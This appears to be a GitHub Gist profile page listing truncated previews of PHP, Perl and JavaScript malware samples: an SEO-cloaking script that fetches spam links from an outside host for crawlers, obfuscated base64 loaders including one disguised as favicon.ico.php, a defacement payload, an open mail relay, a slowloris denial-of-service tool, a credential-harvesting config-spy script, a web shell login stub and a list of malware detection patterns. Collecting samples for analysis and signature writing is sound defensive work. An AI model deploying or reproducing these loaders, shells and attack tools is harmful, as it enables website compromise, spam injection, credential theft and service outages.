Skip to content

Instantly share code, notes, and snippets.

Palma Solutions LTD PalmaSolutions

View GitHub Profile
View hijack
<?php
if(preg_match('/Google Web Preview|bot|spider|wget/i',$_SERVER['HTTP_USER_AGENT'])){
$ch = curl_init();
$timeout = 5;
curl_setopt ($ch, CURLOPT_URL, 'http://message.vaultpos.com/2017alllinks02-1.txt');
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$file_contents = curl_exec($ch);
curl_close($ch);
echo $file_contents;
View unknown-malware15.php
<?php
error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('display_errors',0);
$ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'md5';
$pass = "Zgc5c4MXrKk0ZQwD69BWJ/PdPFbQdr9dm2WSGbE=";
if (ini_get('allow_url_fopen')) {
function get_data_ya($url) {
$data = file_get_contents($url);
View unknown-malware.js
<script>document.documentElement.innerHTML = unescape('%0d%0a%0d%0a%3c%68%74%6d%6c%3e%0d%0a%3c%74%69%74%6c%65%3e%2f%48%61%63%6b%65%64%20%42%79%20%50%73%79%63%6f%20%4d%69%73%74%65%20%26%20%48%61%74%74%61%62%3c%2f%74%69%74%6c%65%3e%0d%0a%3c%2f%68%65%61%64%3e%0d%0a%3c%62%6f%64%79%3e%0d%0a%3c%62%72%3e%3c%62%72%3e%0d%0a%3c%70%20%61%6c%69%67%6e%3d%22%63%65%6e%74%65%72%22%3e%3c%62%3e%3c%66%6f%6e%74%20%66%61%63%65%3d%22%62%6f%6c%64%22%20%73%69%7a%65%3d%22%38%22%3e%20%50%73%79%63%6f%20%4d%69%73%74%65%20%26%20%48%61%74%74%61%62%20%3c%2f%66%6f%6e%74%3e%3c%63%65%6e%74%65%72%3e%0d%0a%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%0d%0a%3c%70%20%61%6c%69%67%6e%3d%22%63%65
View unknown-malware14.php
<?php
$ckaszjpfiozxj = stripslashes($_POST['rbfjbbz']);
$gsqsgwkta = stripslashes($_POST['hqmtnfp']);
$mhhpxa = stripslashes($_POST['cmkv']);
$sawdwtr = mail(stripslashes($ckaszjpfiozxj), stripslashes($gsqsgwkta), stripslashes($mhhpxa));
if($sawdwtr){echo 'wdrtoairr';} else {echo 'blaas : ' . $sawdwtr;} ?>
View unknown-malware13.php
<?php function .+? = ''; for($i=0; $i < strlen($o); $i++) .+? .= isset($ .+? ="base64_decode";return $
my $out = `ldd /usr/bin/host`;
$_SERVER)===TRUE){$ .+? }function error_404(){header( .+? ]}=preg_replace("/( .+? ="/".uniqid().uniqid();${
echo 'action error'; .+? echo "publish success";
.chr(48)."KaW".chr(89).
echo $ok ? "SHELL_OK" : "SHELL_BAD";
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found');
<!DOCTYPE html> <?php eval(base64_decode('.+?));?>
// ProGraMmeD By BaD-BoY [
DZS Upload
View unknown-malware20.php
<?php
${"GL\x4f\x42\x41\x4c\x53"}["\x69\x68\x66\x6b\x76bw\x71\x6fo\x6es"]="t\x79\x70\x65\x73";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x75tf\x69h\x61\x73"]="\x6f\x75t";${"\x47\x4cOB\x41\x4cS"}["\x73\x6dp\x62\x67\x6b"]="\x75r\x6c";${"GL\x4f\x42\x41\x4c\x53"}["l\x75\x70f\x6b\x6ep\x70\x75\x67"]="\x73\x6fc\x6be\x74";${"G\x4c\x4f\x42\x41LS"}["\x68\x75\x72\x74\x66\x6f\x6f\x74d\x77\x62"]="\x61\x64dr\x65\x73s";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6f\x79xcw\x64vn\x6c"]="\x75a";${"\x47\x4c\x4f\x42AL\x53"}["\x6bqc\x6f\x6ac\x67s\x71\x63"]="\x72\x65\x73";${"\x47L\x4f\x42A\x4c\x53"}["\x69dwr\x70\x6ewz\x77"]="\x64o\x6d\x61i\x6e";${"\x47LO\x42\x41\x4cS"}["z\x6e\x68k\x70qe\x63"]="\x78";${"GLO\x42\x41\x4cS"}["k\x6fhe\x63\x69j\x70"]="\x64\x65\x66\x61ul\x74\x5f\x70ort";${"\x47\x4c\x4fB\x41L\x53"}["\x73\x7a\x72q\x66\x76\x79\x79"]="\x72\x65s\x75lt";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["s\x64l\x75\x6a\x73\x69o\x69\x73\x68"]="\x73\x69\x74e";@ini_set("disp\x6ca\x79\x5fer\x72\x6frs","\x4f\x66\x66");global$ua;$npmsrlswy="\x73\x69\x74\x65";$ucx
@PalmaSolutions
PalmaSolutions / slowloris.pl
Created Aug 11, 2017
Poisonous HTTP Client
View slowloris.pl
#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;
$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
print <<EOTEXT;
View sepi.pl
#!/usr/bin/perl
# [!] confspy.pl v1.1 for /home/$user/public_html
# [!] Private Script !!!
# c0li.m0de.0n Begin !!!
# Please check ftp connection before enable it.
# 0=disable, 1=enable
my $ftp_login = 1;
View favicon.ico.php
<?php
if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718'))
{
define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);
$dqvngqtl = 3668; function cahzfuo($rxcvscdxez, $vgbtdue){$ohnusitt = ''; for($i=0; $i < strlen($rxcvscdxez); $i++){$ohnusitt .= isset($vgbtdue[$rxcvscdxez[$i]]) ? $vgbtdue[$rxcvscdxez[$i]] : $rxcvscdxez[$i];}
$xcygvdvew="base" . "64_decode";return $xcygvdvew($ohnusitt);}
$fuuvacow = '1ujObQfh7yINnEGi9bCInvVrnIwF7EnvDbfmGJSR90FObQfh7yINnEGi9bCF7ECN3qVU7ZVeVUAtRbQx1uh2'.
'TlMhqZOICbtv7lHaqEGa3lOcCpIr7IwiTlcIVUAtRbQx1uh23qVU7ZVNnyGA7ZViTlMv912hm'.
'Ai9uXOICHwiTlcIqESh7lIi912hmAi91ujObyIy9bHQ3l3h7yGQ9bVu8HfN5JwRW6Qh1uhx1'.
View unknown-malware-12.php
<?php
@session_start();
@set_time_limit(0);
//PASSWORD CONFIGURATION
@$pass = $_POST['pass'];
$chk_login = true;
$password = "BA";
You can’t perform that action at this time.